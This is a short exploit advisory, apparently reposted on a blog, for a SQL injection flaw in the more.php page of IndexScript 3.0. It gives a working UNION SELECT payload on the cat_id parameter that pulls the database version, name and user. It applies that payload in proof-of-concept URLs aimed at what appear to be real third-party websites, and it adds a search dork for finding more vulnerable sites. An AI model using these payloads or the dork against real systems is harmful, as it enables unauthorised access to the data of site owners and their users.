LFI to RCE via access_log injection

IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection VulnerabilitySoftware : IndexScript version 3.0
Vendor   : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"

Comments

labatterie said…
Very nice toturial my dear...